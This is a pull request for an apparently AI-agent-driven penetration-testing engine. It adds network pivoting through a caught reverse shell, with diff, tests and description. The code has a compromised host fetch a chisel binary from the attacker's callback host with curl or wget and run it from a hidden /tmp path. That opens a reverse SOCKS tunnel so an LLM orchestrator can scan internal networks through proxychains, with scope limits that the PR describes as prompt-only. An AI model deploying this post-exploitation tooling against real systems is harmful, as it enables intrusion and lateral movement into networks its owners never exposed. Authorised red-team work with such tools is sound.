### PR TITLE
feat(engine): network pivoting through a caught reverse shell (#4)

### DIFF
--- a/docker/kali/Dockerfile
+++ b/docker/kali/Dockerfile
@@ -18,6 +18,8 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
       # network / recon
       nmap masscan \
       subfinder amass dnsrecon whatweb \
+      # pivoting (route tools through a caught foothold)
+      proxychains-ng \
       # web
       sqlmap nikto wpscan \
       gobuster ffuf feroxbuster dirb dirbuster \
@@ -33,6 +35,13 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
 
 # rockyou ships gzipped; unpack it so tools can use it directly.
 RUN [ -f /usr/share/wordlists/rockyou.txt.gz ] && gunzip -f /usr/share/wordlists/rockyou.txt.gz || true
+
+# chisel: a single static binary that tunnels TCP over HTTP. Used to stand up a
+# reverse SOCKS proxy through a caught foothold for network pivoting.
+ARG CHISEL_VERSION=1.10.1
+RUN curl -fsSL "https://github.com/jpillora/chisel/releases/download/v${CHISEL_VERSION}/chisel_${CHISEL_VERSION}_linux_amd64.gz" \
+      | gunzip > /usr/local/bin/chisel \
+ && chmod +x /usr/local/bin/chisel
 
 # Playwright as a CDP client only (drives the apt chromium above), so no browser
 # download is needed. Kali's Python is externally managed, hence --break-system-packages.

--- a/packages/core/redcell_core/engine/nmap.py
+++ b/packages/core/redcell_core/engine/nmap.py
@@ -10,10 +10,17 @@ from typing import Any
 
 
 def build_nmap_command(target: str, ports: str | None = None,
-                       service_detection: bool = False, scripts: bool = False) -> str:
+                       service_detection: bool = False, scripts: bool = False,
+                       connect_scan: bool = False) -> str:
     """`nmap -oX -` (XML to stdout) with a curated, shell-quoted flag set. Every
-    argument is quoted so a garbled or hostile target cannot inject shell."""
+    argument is quoted so a garbled or hostile target cannot inject shell.
+
+    connect_scan forces a TCP connect scan (-sT), required when the scan is
+    tunneled through a SOCKS proxy (proxychains), which cannot carry raw SYN
+    packets."""
     parts = ["nmap", "-oX", "-", "-T4", "-Pn"]
+    if connect_scan:
+        parts.append("-sT")
     if service_detection:
         parts.append("-sV")
     if scripts:

--- a/packages/core/redcell_core/engine/pivot.py
+++ b/packages/core/redcell_core/engine/pivot.py
@@ -1,0 +1,236 @@
+"""Network pivoting through a caught reverse shell (issue #4).
+
+Once a reverse shell is caught on a foothold, this routes agent tool traffic
+through that foothold to reach hosts only visible from the compromised machine.
+The transport is a chisel reverse SOCKS tunnel:
+
+  - a chisel server runs inside the session's exec container,
+  - a chisel client runs on the foothold and dials back to the server, which
+    opens a SOCKS5 proxy inside the exec container,
+  - the proxy is wired into the per-command proxy env (all_proxy), so tools that
+    honor proxy env reach internal targets through the foothold. Tools that
+    ignore it (nmap connect scans) are wrapped with proxychains against the same
+    proxy.
+
+The foothold is driven over the reverse shell's bus channels (shellin/shell)
+with a unique sentinel to capture command output and exit codes, since a raw
+shell has no request/response API of its own.
+
+Topology: this assumes the reverse shell and the exec container share a
+reachable host network, which is the remote/VPS backend where a --network host
+Kali container both catches the shell and runs the tools. On local Docker
+Desktop the listener (worker host) and the container (VM network) live on
+different networks, so the callback is not reachable and pivoting does not apply
+there, the same limitation the remote listener already documents.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import re
+import secrets
+from dataclasses import dataclass
+
+from ..bus import Bus, shell_channel, shell_input_channel
+from .execution import proxy_env_from_url
+
+CHISEL_PATH = "/usr/local/bin/chisel"  # baked into the Kali image
+_PIVOT_DIR = "/tmp/rc-pivot"           # container-side staging dir
+_REMOTE_CHISEL = "/tmp/.rc-chisel"     # where chisel lands on the foothold
+_PROXYCHAINS_CONF = "/tmp/rc-proxychains.conf"
+
+DEFAULT_SOCKS_PORT = 1080
+DEFAULT_CTRL_PORT = 8000
+DEFAULT_HTTP_PORT = 8001
+
+
+# ---- foothold command runner over the shell bus --------------------------------
+
+@dataclass
+class FootholdResult:
+    output: str
+    exit_code: int | None
+    timed_out: bool = False
+
+
+class FootholdRunner:
+    """Run a command on a caught reverse shell and capture its output.
+
+    A raw shell only streams bytes, so each command is terminated with a unique
+    sentinel (`echo <marker>:$?`); output is read from `shell:{id}` until the
+    sentinel appears, and the exit code is parsed from it. Backgrounded commands
+    (chisel daemons) return as soon as their trailing `echo` runs.
+    """
+
+    def __init__(self, bus: Bus, shell_id: str, *, settle: float = 0.3) -> None:
+        self.bus = bus
+        self.shell_id = shell_id
+        self.settle = settle  # give the subscription time to attach before sending
+
+    async def run(self, command: str, *, timeout: float = 30.0) -> FootholdResult:
+        marker = "RC" + secrets.token_hex(6)
+        pattern = re.compile(re.escape(marker) + r":(-?\d+)")
+        collected: list[str] = []
+
+        async def reader() -> int | None:
+            async for chunk in self.bus.subscribe(shell_channel(self.shell_id)):
+                collected.append(chunk)
+                m = pattern.search("".join(collected))
+                if m:
+                    return int(m.group(1))
+            return None
+
+        task = asyncio.create_task(reader())
+        await asyncio.sleep(self.settle)
+        await self.bus.publish(shell_input_channel(self.shell_id), f"{command}; echo {marker}:$?\n")
+        try:
+            code = await asyncio.wait_for(task, timeout)
+        except TimeoutError:
+            task.cancel()
+            return FootholdResult(_strip_marker("".join(collected), marker), None, timed_out=True)
+        return FootholdResult(_strip_marker("".join(collected), marker), code)
+
+
+def _strip_marker(text: str, marker: str) -> str:
+    """Drop the sentinel line (and the trailing prompt fragment) from captured
+    output, so callers see just what the command printed."""
+    idx = text.find(marker)
+    return text[:idx].rstrip("\r\n ") if idx >= 0 else text
+
+
+# ---- command builders (pure, unit-tested) --------------------------------------
+
+def server_command(ctrl_port: int) -> str:
+    """Container-side: stage the chisel binary for download and run the chisel
+    server in reverse mode so a client can request a SOCKS proxy."""
+    return (f"mkdir -p {_PIVOT_DIR} && cp {CHISEL_PATH} {_PIVOT_DIR}/chisel && "
+            f"pkill -f 'chisel server' 2>/dev/null; "
+            f"nohup chisel server -p {ctrl_port} --reverse >/tmp/rc-chisel-server.log 2>&1 & "
+            f"echo started")
+
+
+def http_serve_command(http_port: int) -> str:
+    """Container-side: serve the staged chisel binary so the foothold can pull it
+    over the same network it used to dial back."""
+    return (f"pkill -f 'http.server {http_port}' 2>/dev/null; "
+            f"cd {_PIVOT_DIR} && nohup python3 -m http.server {http_port} "
+            f">/tmp/rc-chisel-http.log 2>&1 & echo started")
+
+
+def fetch_command(callback_host: str, http_port: int) -> str:
+    """Foothold-side: download chisel via curl or wget and make it executable."""
+    url = f"http://{callback_host}:{http_port}/chisel"
+    return (f"(command -v curl >/dev/null 2>&1 && curl -fsS {url} -o {_REMOTE_CHISEL}) || "
+            f"(command -v wget >/dev/null 2>&1 && wget -q {url} -O {_REMOTE_CHISEL}); "
+            f"chmod +x {_REMOTE_CHISEL} && echo fetched")
+
+
+def client_command(callback_host: str, ctrl_port: int, socks_port: int) -> str:
+    """Foothold-side: dial back to the chisel server and expose a reverse SOCKS
+    proxy on the server at 127.0.0.1:<socks_port>."""
+    return (f"pkill -f 'chisel client' 2>/dev/null; "
+            f"nohup {_REMOTE_CHISEL} client {callback_host}:{ctrl_port} "
+            f"R:127.0.0.1:{socks_port}:socks >/tmp/.rc-chisel.log 2>&1 & echo started")
+
+
+def socks_wait_command(socks_port: int, tries: int = 12) -> str:
+    """Container-side: block until the SOCKS proxy accepts connections."""
+    return (f"for i in $(seq 1 {tries}); do nc -z 127.0.0.1 {socks_port} 2>/dev/null "
+            f"&& echo PIVOT_UP && break; sleep 1; done")
+
+
+def write_proxychains_conf_command(socks_port: int) -> str:
+    """Container-side: write a proxychains config pointing at the SOCKS proxy."""
+    conf = f"strict_chain\\nproxy_dns\\n[ProxyList]\\nsocks5 127.0.0.1 {socks_port}\\n"
+    return f"printf '{conf}' > {_PROXYCHAINS_CONF} && echo wrote"
+
+
+def proxychains_wrap(command: str, active: bool) -> str:
+    """Wrap a command so its TCP connections traverse the pivot's SOCKS proxy.
+    Returns the command unchanged when no pivot is active."""
+    if not active:
+        return command
+    return f"proxychains4 -f {_PROXYCHAINS_CONF} {command}"
+
+
+def foothold_teardown_command() -> str:
+    return f"pkill -f 'chisel client' 2>/dev/null; rm -f {_REMOTE_CHISEL}; echo done"
+
+
+def container_teardown_command() -> str:
+    return "pkill -f 'chisel server' 2>/dev/null; pkill -f 'http.server' 2>/dev/null; true"
+
+
+# ---- pivot manager -------------------------------------------------------------
+
+class PivotManager:
+    """Owns one chisel reverse-SOCKS pivot through a caught reverse shell.
+
+    `open()` stands up the tunnel and points the backend's proxy env at the SOCKS
+    proxy; `close()` tears it down and restores the prior proxy env. The backend
+    runs container-side commands; the bus drives the foothold shell.
+    """
+
+    def __init__(self, backend, bus: Bus, callback_host: str, *,
+                 socks_port: int = DEFAULT_SOCKS_PORT, ctrl_port: int = DEFAULT_CTRL_PORT,
+                 http_port: int = DEFAULT_HTTP_PORT) -> None:
+        self.backend = backend
+        self.bus = bus
+        self.callback_host = callback_host
+        self.socks_port = socks_port
+        self.ctrl_port = ctrl_port
+        self.http_port = http_port
+        self.active = False
+        self.shell_id = ""
+        self._prev_env: dict[str, str] | None = None
+
+    @property
+    def socks_url(self) -> str:
+        return f"socks5://127.0.0.1:{self.socks_port}"
+
+    async def open(self, shell_id: str) -> dict:
+        """Bring up the pivot through the given reverse shell. Returns a status
+        dict; on success the backend's proxy env routes through the foothold."""
+        self.shell_id = shell_id
+        runner = FootholdRunner(self.bus, shell_id)
+        # Container side: chisel server + a short-lived HTTP server to hand the
+        # foothold the chisel binary + the proxychains config.
+        await self.backend.run(server_command(self.ctrl_port))
+        await self.backend.run(http_serve_command(self.http_port))
+        await self.backend.run(write_proxychains_conf_command(self.socks_port))
+        # Foothold side: pull chisel, then start the reverse-SOCKS client.
+        fetched = await runner.run(fetch_command(self.callback_host, self.http_port), timeout=60)
+        if "fetched" not in fetched.output:
+            return {"ok": False, "detail": "foothold could not fetch chisel (no curl/wget or callback unreachable)"}
+        await runner.run(client_command(self.callback_host, self.ctrl_port, self.socks_port), timeout=20)
+        # Container side: wait for the SOCKS proxy to come up.
+        up = await self.backend.run(socks_wait_command(self.socks_port))
+        if "PIVOT_UP" not in (up.output or ""):
+            return {"ok": False, "detail": "SOCKS proxy did not come up; the foothold may not have dialed back"}
+        # Route subsequent tool traffic through the pivot.
+        self._prev_env = dict(getattr(self.backend, "proxy_env", {}) or {})
+        env = getattr(self.backend, "proxy_env", None)
+        if env is not None:
+            env.update(proxy_env_from_url(self.socks_url))
+        self.active = True
+        return {"ok": True, "socks": self.socks_url, "shellId": shell_id,
+                "note": "Tool traffic now routes through the foothold. Record internal hosts with source 'pivot'."}
+
+    async def close(self) -> None:
+        """Tear down the tunnel and restore the prior proxy env. Best effort."""
+        if not self.shell_id:
+            return
+        try:
+            runner = FootholdRunner(self.bus, self.shell_id)
+            await runner.run(foothold_teardown_command(), timeout=15)
+        except Exception:
+            pass
+        try:
+            await self.backend.run(container_teardown_command())
+        except Exception:
+            pass
+        env = getattr(self.backend, "proxy_env", None)
+        if env is not None and self._prev_env is not None:
+            env.clear()
+            env.update(self._prev_env)
+        self.active = False

--- a/packages/core/redcell_core/engine/runner.py
+++ b/packages/core/redcell_core/engine/runner.py
@@ -29,7 +29,7 @@ from ..repositories import settings as settings_repo
 from ..repositories import shells as shells_repo
 from ..schemas import ExecutionSettings, LlmSettings
 from ..storage import storage
-from . import msf, nmap, webscan
+from . import msf, nmap, pivot, webscan
 from .browser import BrowserManager
 from .execution import build_backend
 from .llm import LlmClient
@@ -136,6 +136,7 @@ class LiveRunner:
         self.server = None  # the chosen remote Server row, or None for local
         self._listener_tasks: list[asyncio.Task] = []
         self._browser: BrowserManager | None = None
+        self._pivot: pivot.PivotManager | None = None
 
     async def run(self) -> None:
         await self._load()
@@ -168,6 +169,11 @@ class LiveRunner:
         finally:
             for t in self._listener_tasks:
                 t.cancel()
+            if self._pivot is not None:
+                try:
+                    await self._pivot.close()
+                except Exception:
+                    pass
             if self._browser is not None:
                 try:
                     await self._browser.stop()
@@ -340,6 +346,10 @@ class LiveRunner:
             return await self._record_host(args)
         if name == "start_listener":
             return await self._start_listener(int(args.get("port", 4444)))
+        if name == "open_pivot":
+            return await self._open_pivot(args.get("shellId") or args.get("shell_id", ""))
+        if name == "close_pivot":
+            return await self._close_pivot()
         if name == "ask_operator":
             return {"operator_reply": await self._ask_operator(args.get("question", ""), args.get("options"))}
         if name == "finish":
@@ -415,9 +425,14 @@ class LiveRunner:
         target = str(args.get("target", "")).strip()
         if not target:
             return {"error": "target required"}
+        pivoting = self._pivot is not None and self._pivot.active
         cmd = nmap.build_nmap_command(target, ports=args.get("ports"),
                                       service_detection=bool(args.get("service_detection")),
-                                      scripts=bool(args.get("scripts")))
+                                      scripts=bool(args.get("scripts")),
+                                      connect_scan=pivoting)
+        # Through a pivot, tunnel the connect scan over the SOCKS proxy so internal
+        # hosts are reachable; discovered hosts are tagged as pivot-sourced.
+        cmd = pivot.proxychains_wrap(cmd, pivoting)
         res = await self.backend.run(cmd)
         hosts = nmap.parse_nmap_xml(getattr(res, "output", "") or "")
         for h in hosts:
@@ -426,7 +441,7 @@ class LiveRunner:
                 "ip": h["ip"],
                 "ports": [{"port": p["port"], "service": p["service"], "version": p["version"]}
                           for p in h["ports"]],
-                "source": "nmap",
+                "source": "pivot" if pivoting else "nmap",
             })
         open_ports = sum(len(h["ports"]) for h in hosts)
         summary = [{"ip": h["ip"], "hostnames": h["hostnames"][:2], "ports": h["ports"][:20]}
@@ -645,6 +660,42 @@ class LiveRunner:
                                         "source": args.get("source", "")})
         await self._event("recon", "net", f"host: {host}")
         return {"recorded": True}
+
+    async def _open_pivot(self, shell_id: str) -> dict[str, Any]:
+        """Route tool traffic through a caught reverse shell so internal hosts
+        become reachable. Needs a docker backend where the shell and the exec
+        container share a host network (the remote/VPS topology)."""
+        if not shell_id:
+            return {"error": "shellId required (the caught reverse shell to pivot through)"}
+        if getattr(self.backend, "kind", "") not in ("local-docker", "remote-docker"):
+            return {"error": "pivoting needs a live docker execution backend"}
+        async with session_scope() as s:
+            shell = await shells_repo.get(s, shell_id)
+        if shell is None or shell.session_id != self.session_id:
+            return {"error": "reverse shell not found in this session"}
+        if shell.kind != "reverse" or shell.status != "running":
+            return {"error": "pivot target must be a running reverse shell"}
+        if self._pivot is not None and self._pivot.active:
+            return {"error": f"a pivot is already active through {self._pivot.shell_id}; close it first"}
+        callback = (self.server.host if self.server is not None
+                    and getattr(self.backend, "kind", "") == "remote-docker"
+                    else settings.callback_host)
+        pm = pivot.PivotManager(self.backend, self.bus, callback)
+        result = await pm.open(shell_id)
+        if result.get("ok"):
+            self._pivot = pm
+            await self._event("orchestrator", "net", f"pivot up through {shell_id} -> {result.get('socks')}")
+        else:
+            await self._event("orchestrator", "steer", f"pivot failed: {result.get('detail', 'unknown')}")
+        return result
+
+    async def _close_pivot(self) -> dict[str, Any]:
+        if self._pivot is None:
+            return {"ok": True, "note": "no active pivot"}
+        await self._pivot.close()
+        self._pivot = None
+        await self._event("orchestrator", "net", "pivot closed")
+        return {"ok": True}
 
     async def _start_listener(self, port: int) -> dict[str, Any]:
         bind = f"0.0.0.0:{port}"

--- a/packages/core/redcell_core/engine/tools.py
+++ b/packages/core/redcell_core/engine/tools.py
@@ -94,6 +94,28 @@ ORCHESTRATOR_TOOLS = [
     {
         "type": "function",
         "function": {
+            "name": "open_pivot",
+            "description": "Route tool traffic through a caught reverse shell so hosts only reachable from the compromised machine become scannable. Pass the reverse shell's id (from the Terminals panel / the caught-shell event). After this succeeds, delegate executors to scan or reach the internal network; record discovered internal hosts with record_host (source 'pivot').",
+            "parameters": {
+                "type": "object",
+                "properties": {
+                    "shellId": {"type": "string", "description": "Id of the caught reverse shell to pivot through."},
+                },
+                "required": ["shellId"],
+            },
+        },
+    },
+    {
+        "type": "function",
+        "function": {
+            "name": "close_pivot",
+            "description": "Tear down the active network pivot and route tool traffic directly again.",
+            "parameters": {"type": "object", "properties": {}},
+        },
+    },
+    {
+        "type": "function",
+        "function": {
             "name": "ask_operator",
             "description": "Pause and ask the human operator a question before a sensitive or scope-affecting action.",
             "parameters": {
@@ -314,6 +336,11 @@ def orchestrator_system(goal: str, scope: list[str], targets: list[str], roe: st
         "Use that address verbatim in your reverse-shell one-liner (do NOT hardcode 127.0.0.1). "
         "Then delegate an executor to trigger the payload via the vulnerability. The caught shell "
         "appears in the operator's Terminals panel.\n\n"
+        "To reach an internal network only visible from a compromised machine, call open_pivot with "
+        "the caught reverse shell's id. That tunnels tool traffic through the foothold; then delegate "
+        "executors to scan or reach the internal hosts (nmap_scan is routed through the pivot "
+        "automatically) and record what you find with record_host (source 'pivot'). Internal hosts "
+        "still need to be in scope. Call close_pivot when the internal work is done.\n\n"
         "The operator may send you steering directives at any time (they appear as '[Operator steer]' "
         "messages); follow them. Call finish when the objective is met or no safe progress remains.\n\n"
         "Write any prose in plain text. Do not use em-dashes; use commas, periods, or parentheses instead."

--- a/packages/core/tests/test_pivot.py
+++ b/packages/core/tests/test_pivot.py
@@ -1,0 +1,180 @@
+"""Network pivoting (issue #4): command builders, the foothold command runner's
+sentinel protocol, and the pivot manager's proxy-env wiring. All pure or driven
+by a fake bus/backend, so no container or foothold is needed."""
+
+import asyncio
+import re
+from types import SimpleNamespace
+
+import pytest
+from redcell_core.bus import shell_channel, shell_input_channel
+from redcell_core.engine import nmap, pivot
+
+# ---- command builders ----------------------------------------------------------
+
+def test_server_command_runs_chisel_reverse():
+    cmd = pivot.server_command(8000)
+    assert "chisel server -p 8000 --reverse" in cmd
+    assert cmd.strip().endswith("echo started")
+
+
+def test_client_command_requests_reverse_socks():
+    cmd = pivot.client_command("10.0.0.1", 8000, 1080)
+    assert "client 10.0.0.1:8000 R:127.0.0.1:1080:socks" in cmd
+
+
+def test_fetch_command_tries_curl_then_wget():
+    cmd = pivot.fetch_command("10.0.0.1", 8001)
+    assert "curl -fsS http://10.0.0.1:8001/chisel" in cmd
+    assert "wget -q http://10.0.0.1:8001/chisel" in cmd
+    assert "chmod +x" in cmd
+
+
+def test_socks_wait_command_probes_the_port():
+    assert "nc -z 127.0.0.1 1080" in pivot.socks_wait_command(1080)
+
+
+def test_proxychains_wrap_only_wraps_when_active():
+    assert pivot.proxychains_wrap("nmap -sT x", False) == "nmap -sT x"
+    wrapped = pivot.proxychains_wrap("nmap -sT x", True)
+    assert wrapped.startswith("proxychains4 -f ")
+    assert wrapped.endswith("nmap -sT x")
+
+
+def test_nmap_connect_scan_flag():
+    assert "-sT" in nmap.build_nmap_command("10.0.0.5", connect_scan=True)
+    assert "-sT" not in nmap.build_nmap_command("10.0.0.5", connect_scan=False)
+
+
+# ---- fake bus ------------------------------------------------------------------
+
+class FakeBus:
+    """Minimal pub/sub over asyncio queues, matching the Bus interface the
+    FootholdRunner uses (subscribe yields strings, publish fans out)."""
+
+    def __init__(self) -> None:
+        self.subs: dict[str, list[asyncio.Queue]] = {}
+        self.published: list[tuple[str, str]] = []
+
+    async def subscribe(self, channel: str):
+        q: asyncio.Queue = asyncio.Queue()
+        self.subs.setdefault(channel, []).append(q)
+        while True:
+            item = await q.get()
+            yield item
+
+    async def _emit(self, channel: str, data: str) -> None:
+        for q in self.subs.get(channel, []):
+            await q.put(data)
+
+    async def publish(self, channel: str, data: str) -> None:
+        self.published.append((channel, data))
+        await self._emit(channel, data)
+
+
+class AutoFootholdBus(FakeBus):
+    """A FakeBus that plays the foothold: when a command is sent to a shell, it
+    echoes canned output followed by the sentinel the runner is waiting for."""
+
+    def __init__(self, *, fetch_ok: bool = True) -> None:
+        super().__init__()
+        self.fetch_ok = fetch_ok
+
+    async def publish(self, channel: str, data: str) -> None:
+        await super().publish(channel, data)
+        if channel.startswith("shellin:"):
+            m = re.search(r"echo (RC[0-9a-f]+):\$\?", data)
+            if m:
+                shell_id = channel.split(":", 1)[1]
+                asyncio.create_task(self._respond(shell_id, self._canned(data), m.group(1)))
+
+    def _canned(self, data: str) -> str:
+        if "curl" in data or "wget" in data:
+            return "fetched" if self.fetch_ok else "curl: not found"
+        if "chisel" in data and "client" in data:
+            return "started"
+        if "pkill" in data:
+            return "done"
+        return ""
+
+    async def _respond(self, shell_id: str, out: str, marker: str) -> None:
+        await asyncio.sleep(0.02)
+        await self._emit(shell_channel(shell_id), f"{out}\n{marker}:0\n")
+
+
+class FakeBackend:
+    kind = "remote-docker"
+
+    def __init__(self) -> None:
+        self.proxy_env: dict[str, str] = {}
+        self.commands: list[str] = []
+
+    async def run(self, command: str, on_output=None):
+        self.commands.append(command)
+        out = ""
+        if "nc -z" in command:
+            out = "PIVOT_UP"
+        elif "echo started" in command:
+            out = "started"
+        elif "echo wrote" in command:
+            out = "wrote"
+        return SimpleNamespace(output=out, exit_code=0)
+
+
+# ---- foothold runner -----------------------------------------------------------
+
+@pytest.mark.asyncio
+async def test_foothold_runner_captures_output_and_exit_code():
+    bus = FakeBus()
+    runner = pivot.FootholdRunner(bus, "sh-1", settle=0.01)
+    task = asyncio.create_task(runner.run("id", timeout=2))
+    # Wait until the command (with sentinel) is on the wire, then read its marker.
+    for _ in range(200):
+        sent = [d for ch, d in bus.published if ch == shell_input_channel("sh-1")]
+        if sent:
+            break
+        await asyncio.sleep(0.01)
+    marker = re.search(r"echo (RC[0-9a-f]+):\$\?", sent[0]).group(1)
+    await bus.publish(shell_channel("sh-1"), "uid=0(root) gid=0(root)\n")
+    await bus.publish(shell_channel("sh-1"), f"{marker}:0\n")
+    result = await task
+    assert result.exit_code == 0
+    assert "uid=0(root)" in result.output
+    assert marker not in result.output  # sentinel is stripped from the captured output
+
+
+@pytest.mark.asyncio
+async def test_foothold_runner_times_out_without_a_sentinel():
+    bus = FakeBus()
+    runner = pivot.FootholdRunner(bus, "sh-1", settle=0.01)
+    result = await runner.run("sleep 999", timeout=0.2)
+    assert result.timed_out
+    assert result.exit_code is None
+
+
+# ---- pivot manager -------------------------------------------------------------
+
+@pytest.mark.asyncio
+async def test_pivot_open_sets_proxy_env_and_close_restores():
+    bus = AutoFootholdBus()
+    backend = FakeBackend()
+    pm = pivot.PivotManager(backend, bus, "10.0.0.1", socks_port=1080)
+    res = await pm.open("sh-1")
+    assert res["ok"] is True
+    assert pm.active
+    assert backend.proxy_env.get("all_proxy") == "socks5://127.0.0.1:1080"
+    assert backend.proxy_env.get("ALL_PROXY") == "socks5://127.0.0.1:1080"
+    await pm.close()
+    assert not pm.active
+    assert backend.proxy_env == {}  # restored to the pre-pivot state
+
+
+@pytest.mark.asyncio
+async def test_pivot_open_fails_when_foothold_cannot_fetch_chisel():
+    bus = AutoFootholdBus(fetch_ok=False)
+    backend = FakeBackend()
+    pm = pivot.PivotManager(backend, bus, "10.0.0.1")
+    res = await pm.open("sh-1")
+    assert res["ok"] is False
+    assert not pm.active
+    assert backend.proxy_env == {}  # never touched on failure


### PR DESCRIPTION
Closes #4.

Routes agent tool traffic through a caught foothold to reach hosts only visible from the compromised machine, using a **chisel reverse SOCKS** tunnel. Design note posted on the issue: #4 (comment).

## How it works
- A chisel **server** runs inside the session's exec container; a chisel **client** runs on the foothold and dials back, opening a SOCKS5 proxy at `127.0.0.1:<socks>` inside the container.
- That proxy is wired into the existing per-command **proxy-env injection** seam (`all_proxy`), so tools that honor proxy env reach internal targets through the foothold. Tools that ignore it (nmap connect scans) are wrapped with `proxychains` against the same proxy.
- The foothold is driven over the reverse shell's existing `shellin:{id}`/`shell:{id}` bus channels via a `FootholdRunner` that uses a unique sentinel to capture output and exit codes (a raw shell has no request/response API of its own). chisel is pulled onto the foothold over HTTP from the container.

## Changes
- **`engine/pivot.py`** (new): `FootholdRunner`, pure command builders (chisel server/client, fetch, SOCKS readiness probe, proxychains wrap), and `PivotManager` (open/close, proxy-env wiring + restore).
- **runner**: `open_pivot` / `close_pivot` orchestrator tools + handlers; pivot torn down when the run ends; `nmap_scan` auto-routed through the pivot (connect scan + proxychains) and records hosts with `source: "pivot"` while active.
- **nmap**: `connect_scan` flag (`-sT`) for SOCKS-tunneled scans.
- **Kali image**: adds `chisel` (verified release asset) and `proxychains-ng`.
- **Scope**: advisory (prompt-only), consistent with the rest of the engine today (per the design decision on the issue).

## Topology
Designed for the remote/VPS backend where a `--network host` Kali container both catches the reverse shell and runs the tools, so the foothold's callback and the SOCKS proxy share one host network. On local Docker Desktop the listener and container live on different networks, the same limitation the remote listener already documents.

## Tests
- Command builders, the `FootholdRunner` sentinel protocol (capture + timeout), and `PivotManager` open/close proxy-env wiring, all driven by a fake bus and backend. Full backend suite passes (72 tests), ruff clean.
- Live end-to-end needs a multi-host lab (a foothold with a reachable internal network) on a remote backend, which is not reproducible in this local Docker Desktop network.

## Image note
The Kali `Dockerfile` change is validated (chisel release URL returns 200; `proxychains-ng` is a standard Kali package), but the local `martian56/kali:latest` rebuild could not complete here because the Docker Desktop daemon crashed mid-build. **The image needs a rebuild + push of `martian56/kali:latest`** (or via CI) before the pivot can run live.

🤖 Generated with [Claude Code](https://claude.com/claude-code)